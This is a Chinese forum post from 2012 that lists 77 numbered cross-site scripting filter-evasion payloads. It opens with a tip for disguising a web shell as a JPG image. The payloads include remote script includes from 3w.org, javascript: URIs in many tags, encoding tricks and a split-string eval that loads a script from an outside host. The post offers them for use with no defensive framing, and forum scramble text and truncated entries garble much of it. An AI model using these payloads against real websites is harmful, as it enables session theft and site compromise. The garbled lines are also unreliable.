跨站图片shell
( Y1 j, S; ^9 k3 X' dXSS跨站代码 <script>alert("")</script>
/ j3 R5 q* U/ S# F/ w9 K* N, p ^ J" g* z
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
c9 @0 z0 x" ?: `; A- b
2 @) m; w4 I' k4 e V) p1 d$ a; \3 B6 D6 K
# p( I$ ~6 Y E1)普通的XSS JavaScript注入7 i1 y% o3 j: M% _0 \) b0 l- B" g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 V& e' o% R1 A
; ~ C9 \9 R: R, f" H3 R(2)IMG标签XSS使用JavaScript命令
" T4 C9 {4 j3 |& w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 F0 }6 u' T+ K; r; F4 B [. I9 c% x' U
(3)IMG标签无分号无引号
! ~. F' |+ O6 g- A. e<IMG SRC=javascript:alert(‘XSS’)>
0 ~9 k* X: u7 q3 {; l, k' K$ R& x
(4)IMG标签大小写不敏感' M. `8 q) U3 q
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 S: q& y( k7 j! A
' N) A( M$ L5 k6 |! U! X
(5)HTML编码(必须有分号): E9 z" ]+ F3 ^$ U
<IMG SRC=javascript:alert(“XSS”)>
# s3 u3 I' `: H+ a9 {$ L3 `* S. H3 W
(6)修正缺陷IMG标签
( h, ^8 N% h4 O [) y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
# W# \ p( M: @1 ^- B7 r0 g
9 I0 Q+ F3 t' s* [" u/ L(7)formCharCode标签(计算器)% o' l" \( O! ~7 U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 I* O, `) q4 L$ G
# Q3 S0 b% P& q' m6 B, H(8)UTF-8的Unicode编码(计算器)
4 @# G i" G1 C1 \+ ]<IMG SRC=jav..省略..S')>
' f0 g4 L ?3 s2 \1 ~
( {$ {* t G& Z5 ~* j( ?5 e(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
& s# O/ r0 k8 ~! U/ q/ _1 ?& f<IMG SRC=jav..省略..S')>
3 |5 D2 g! G d3 g. G5 a; M
" S2 F7 e/ }6 x! \& J1 ~) a$ ?(10)十六进制编码也是没有分号(计算器)
' l2 q; [0 [- u<IMG SRC=java..省略..XSS')>& N0 D: ~% R9 B$ p3 Z# c
# R2 T$ [1 ~8 C+ m8 t
(11)嵌入式标签,将Javascript分开
: o) r( N2 W: m; ?" b1 v6 \<IMG SRC=”jav ascript:alert(‘XSS’);”>
& ?9 J) V2 O5 g( I) F/ s# J7 V, K& R$ \3 r) i: Y5 {1 M8 M
(12)嵌入式编码标签,将Javascript分开
/ q* o+ I! K3 e! P: [<IMG SRC=”jav ascript:alert(‘XSS’);”>
* c" d% t0 M! N% C. ~. t( d+ t; Z4 |) M, M4 k3 O; J9 ^4 z6 ^
(13)嵌入式换行符0 w, |" S" X- P$ e
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; k4 n; d) z. L8 i; q# S. U
5 l8 v% y" l8 |: Y c8 O. z(14)嵌入式回车
3 R1 j8 C f" |<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 [0 B) D& w2 e( N5 F7 s: N ~$ v& i3 Q8 a" @7 F- q& f
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; ~5 X' U% U0 V7 e% M. M6 p# o: m
<IMG SRC=”javascript:alert(‘XSS‘)”>
( C: m: Q. ] Z1 D+ G) Q6 B. F! D( l. q& Q
(16)解决限制字符(要求同页面); _3 D6 _: G, x( I4 }1 ~6 I! c3 O
<script>z=’document.’</script>
& s7 u1 b9 E8 x( C7 @# w<script>z=z+’write(“‘</script>) l9 y: L8 Q8 A5 y
<script>z=z+’<script’</script>0 n7 D8 n" P: y4 |, K, u: Q
<script>z=z+’ src=ht’</script>2 a- o, l0 `9 B& p9 \# o
<script>z=z+’tp://ww’</script>
2 { L/ E! B1 @" N8 `- ^; d' Y<script>z=z+’w.shell’</script> Q- ^8 G K; X+ Z6 Y5 y# g
<script>z=z+’.net/1.’</script>
0 e' [; @$ x/ Z: l6 A<script>z=z+’js></sc’</script>
1 u- M; l* I2 z# S; z% t2 c7 f3 c<script>z=z+’ript>”)’</script>
- w) I4 h! d# ~) C9 E3 a4 J<script>eval_r(z)</script>
& N! J! l! D/ X. Z9 L' C9 w& p% T+ T
(17)空字符 C. e4 i% z6 |3 {. S+ U
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out- p, m7 B n% t6 ?6 i% g
. k0 @* c8 l9 _
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
9 K& j, ]& C. |perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" ?1 e1 Y; G( M) S3 Y4 A: L4 f7 \, ?- ~5 H3 Y
(19)Spaces和meta前的IMG标签
' ?: Q4 @& J& _* g/ c<IMG SRC=” javascript:alert(‘XSS’);”>
! q* G0 F, h/ f4 N3 J x1 d
6 Z P( W: S9 q B/ } Z! p, J$ R(20)Non-alpha-non-digit XSS4 Z |' U6 | |' F. X
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 i V. z7 @9 e! O
4 \* u/ f; d. i. k# C% h' X(21)Non-alpha-non-digit XSS to 25 H% H9 L+ ^. X! D8 O4 ^; J% }
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># P( a2 L# k& U- K
9 x; G. v1 {" e* ] O; i
(22)Non-alpha-non-digit XSS to 3
0 w& q4 m: b) m6 a" j<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 ~ J1 E' s' t
8 b$ ~3 @8 r- \+ h/ V8 b7 a- I3 c(23)双开括号
5 k6 Z; X' q7 J n. A Y<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 _6 Y- X+ a# A: m: j8 q
, ~: v/ J* o- t$ g4 s# i" j(24)无结束脚本标记(仅火狐等浏览器)
! H. a7 Z& F2 n i# E0 y( T( z<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- `3 j# }- s8 S4 b
! s( f" S$ S0 C& ^% @3 s(25)无结束脚本标记2
9 u$ ^# `% |% |' W$ i<SCRIPT SRC=//3w.org/XSS/xss.js>
) u5 `7 J8 R0 t9 R9 A8 W0 C
, E; f2 ~$ W" s$ |3 U3 K# D(26)半开的HTML/JavaScript XSS
8 @. c2 C2 H1 S) T' ]% E) I, p! s<IMG SRC=”javascript:alert(‘XSS’)”4 a0 z+ S% h3 ~1 z
2 Z% K* o9 t2 [9 ~8 V; M(27)双开角括号
6 P$ d" s2 J7 }; t- v: V: g" s<iframe src=http://3w.org/XSS.html <+ a% I& ?8 C3 n# \+ b' v6 @
/ Y5 L, Z, O7 X(28)无单引号 双引号 分号& O/ Z& k. M* `
<SCRIPT>a=/XSS/+ b$ K+ N1 k+ F
alert(a.source)</SCRIPT>
8 Q- J W+ I+ C: q ]; M- C
- F2 n6 j0 e! a( s6 R- o(29)换码过滤的JavaScript& @' N$ ~! M5 N H* w
\”;alert(‘XSS’);//
1 F' q2 D0 `: e! W0 l, G2 _5 |7 ]
* p' ]3 X# K7 L7 ](30)结束Title标签9 z0 [1 a. N# Z! C7 n0 h" s
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
9 W( @& n7 k. d
7 s; u1 j Q" x r(31)Input Image
! G4 D3 y3 x J6 J* _9 N5 _<INPUT SRC=”javascript:alert(‘XSS’);”>! [$ d* q, D% }3 F5 C: S
1 ]8 j; j/ U$ n! ~5 W- F/ h/ a; N! S
(32)BODY Image$ D2 L8 W+ k8 N3 Z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 {! k2 i, z% ~+ Q- N% u
6 _# e3 d! B: e& y- C
(33)BODY标签
6 x) [" X; W7 n+ M l<BODY(‘XSS’)>+ B7 o# m; n% T5 I& n
/ {1 ~; _! W' H% r- d5 j% O4 C4 e(34)IMG Dynsrc& w1 |6 p6 g, \
<IMG DYNSRC=”javascript:alert(‘XSS’)”>! F' w# q% r. ~: q) B8 J' G6 z
* O' T3 x0 r& Q8 F) G, m& m! c' t(35)IMG Lowsrc
v' \) }$ W: ^) N. v" B<IMG LOWSRC=”javascript:alert(‘XSS’)”>1 a, z, f z/ o1 w3 q
; l# w. u' x; X2 |/ I7 [
(36)BGSOUND0 w! f4 J# e: S% _) F+ s) Z* V2 Q
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
3 e! e/ V# u4 s5 F0 o# |4 N) l! a* \9 `4 h1 K) T" i
(37)STYLE sheet
1 ^! }" A' h0 Z) E<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 b! Z" v. {0 D* B4 g; d7 }; ?' j* X- j7 }9 a& S
(38)远程样式表
( m& a* C, J; N# i( k% s7 e- g<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>9 \" ?! y' i5 l( N# B8 Y
) o$ }7 p: _) S y9 }1 E(39)List-style-image(列表式)
; y4 x B3 e* z1 g' _% `0 Y$ c<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
: u, f! [ ^3 M, y4 y; g, I: E% Q% V/ K+ u
(40)IMG VBscript( B* e6 h* z) l- c
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 E" p$ u& Q7 L! | z' ?; U
( s- H! h F4 Q$ J; n
(41)META链接url0 q; x0 w5 H+ `; d# B, U @
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
" m6 v8 J2 j$ D" [# \6 L0 J* Z6 L8 q( P: m2 o
(42)Iframe: D0 F9 c7 w9 `) I: _0 C: t
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 }5 Z3 z- S/ t, Y(43)Frame! n7 T9 Y# k4 f! M0 k$ Y% {! o, X* m
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
* {8 y, i' k2 ~2 p5 L: Z5 Z' x. Z: w# m( B
(44)Table6 ?2 H; N0 j& b- O( \8 R! ` k
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
O8 ~% z; U. E# x3 X% O/ L
1 `1 d& ~7 j7 w) J8 ?(45)TD3 s T3 k6 i& A
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 d2 j# ?' _+ e8 ]+ N/ U! h; y+ f
9 Z% f1 R, h! ^
(46)DIV background-image
; H1 C5 D, V [( @" k: F3 D: J<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. `, @! b4 {+ J- Y) k( n: q5 P/ _2 L# _6 A* y; f8 h( M: ^ Y0 M
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
4 o, {8 K& r# B' Y9 i<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
" x c% D4 f7 s7 e* U
$ ^( p7 u( e6 n4 J7 ]9 z(48)DIV expression& ~7 X- j* L" n; G* u: ~' o; O
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
2 e, Z, r( C+ U) M6 I" {1 V% r% I K0 N2 E" p: V/ Z
(49)STYLE属性分拆表达
; l2 u7 t x4 k<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: o1 y: u+ ^8 j/ g
) S2 L# B' E, M! d7 ~(50)匿名STYLE(组成:开角号和一个字母开头)' c$ @8 d* F, M3 V( M& T" X
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>' B1 J. M! k6 a+ H
+ ~* M7 M( M+ B$ L4 S
(51)STYLE background-image
+ D4 O/ G$ c! `& ^<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
( u' o7 O9 F# z ^) V# Z w! e3 Y5 t5 A8 [/ a$ H
(52)IMG STYLE方式
3 M# ?. M' x+ Q) r2 p4 Texppression(alert(“XSS”))’>
0 i& g \7 @4 u9 Y }6 T" Q2 X. H' Y, |' z# u' W+ h
(53)STYLE background
2 @( i) P- y3 ?0 T. E1 G. G<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 h% a3 p# y i1 R6 Z# G8 B* o8 v. G0 r) s& h* k: C \
(54)BASE
& x9 Z0 p g0 }* t5 I8 \* ?4 M4 m<BASE HREF=”javascript:alert(‘XSS’);//”>( O+ r8 y1 _3 o0 p( r
, Z/ i" T/ Z+ D(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ u6 k0 V9 H3 y" c( {; `) e) t0 s<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
6 M9 D( `: ~9 w" U( `4 e! C+ x2 m7 v5 \& k) Y
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 I1 g! Z2 D5 k8 m U$ Da=”get”;
Q+ P2 f* V7 g }b=”URL(\”";
/ E& S; v5 b8 V6 ?* Kc=”javascript:”;1 s! v" c# j; f* k. k6 o
d=”alert(‘XSS’);\”)”;) n6 M9 v) N4 ]/ L7 A* q8 L
eval_r(a+b+c+d);
4 ^, m" U0 ?: D3 N# w* G, o& n4 a: p* F4 v; F, W& P- s
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上 c8 l5 J# z! n% N( |/ F
<HTML xmlns:xss>
! s# y) e# Z/ G. t% ?<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! a/ \$ J% ?- D9 i6 v# D<xss:xss>XSS</xss:xss>
: Z. @1 v* i& Z4 U2 d' K</HTML>
: m$ y/ ]7 e( o1 _5 c
" D3 I1 T' S* m k$ I4 ~- E(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ x& Z- _3 {" v
<SCRIPT SRC=””></SCRIPT>
/ B$ V( ~/ j4 C8 P+ |% H* H2 e8 t$ k
(59)IMG嵌入式命令,可执行任意命令
% e% V4 z- i* V$ ^<IMG SRC=”http://www.XXX.com/a.php?a=b”>0 A4 h% v0 t- G; b( N
: u% Z/ S) [7 V, C/ z! I. H(60)IMG嵌入式命令(a.jpg在同服务器)
- k4 [3 v! g, }+ D. C9 CRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- f* `# | h, t3 f! y2 ^4 E
. b) k, e" N# p(61)绕符号过滤5 t! n$ V6 }4 {6 m1 \; F4 N- k
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 X& P' z j( W8 j9 P
4 f& D/ ]- F+ ~2 ]! v% M(62)( H) D1 j9 L' c$ E
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% x- a/ Z- w) a, n* T
/ `+ p! r- z2 f s2 o(63)8 h/ u4 H$ c* r v
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& k7 H; c- z N( X& v# M) C. D& h6 ]0 z( j) |
(64)+ z0 U) h: ~2 M: d& Z: e: ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 |0 {* ^# D7 V/ C9 F4 E% t9 m
* e7 q7 ?7 t5 s3 K(65)9 Y6 M& H/ x. o( I; w# J
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 Z* w- g% _2 k' d! r. }/ j* z3 H9 ]5 z% _
(66)' K' Q9 Y+ a( z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>$ Q% Y) T/ |3 x# X3 Y, L A2 U/ X
% {1 f$ M: V7 N- r: Z
(67)7 \9 }( o0 A y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* k" _$ U* J" R, V) W3 ~4 l
# p+ O+ A; _# `5 y1 A(68)URL绕行
2 ?# T, F- N' r. y$ S<A HREF=”http://127.0.0.1/”>XSS</A>
q& P% i9 ^5 F- x9 m( C! n' o( W, M2 L( L8 a
(69)URL编码
3 v, o+ c' Q* X$ K* a<A HREF=”http://3w.org”>XSS</A>
9 W2 a, B) Y9 t5 q# p5 j7 \4 b" I
(70)IP十进制
3 }+ U* k4 S( Q+ v; `<A HREF=”http://3232235521″>XSS</A>
$ e2 Z# z0 Z# E- C% k
A1 n4 f+ M3 G7 D( [3 Q# Z8 `(71)IP十六进制
: @ z( Q9 j1 {9 h, Y# b/ o<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 g# k* P$ Y( S1 s, d! @
/ [& J: `$ P% J& z(72)IP八进制; p! f0 I' ?2 i" ]
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
1 {* A+ j) y2 z' Q' A& ?
U' H# S) A* C(73)混合编码! t& i! P' i3 n6 z/ L. m
<A HREF=”h
/ K* O, B5 S6 |3 z- Dtt p://6 6.000146.0×7.147/”">XSS</A>
/ W. j1 [0 [: T( B9 k" B
! b$ u! B7 M: M" x& I" Z- f(74)节省[http:]" V# B8 |, c( p H3 U V
<A HREF=”//www.google.com/”>XSS</A>
, Z2 t& D9 O: D, p# Z7 X% M7 D# n4 D1 H. O* c8 a( J
(75)节省[www]
- n% o1 c! ]' d2 k2 N+ T# C4 ~<A HREF=”http://google.com/”>XSS</A>. [' C5 h8 h8 {/ [$ e
3 J5 ]; J( Z+ t" a$ U# ](76)绝对点绝对DNS# Y) @+ n, x: q, r- G: }
<A HREF=”http://www.google.com./”>XSS</A>
$ I% k- H: G% h* H
5 H( L* r7 X5 X1 z1 t6 b3 h" `(77)javascript链接9 M- v0 Z3 }7 D l9 s/ z" B5 z0 l' G) ?6 h
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>+ Q7 {) D$ @' m2 K
|
发表于 2012-9-13 17:04:56
收藏
支持
反对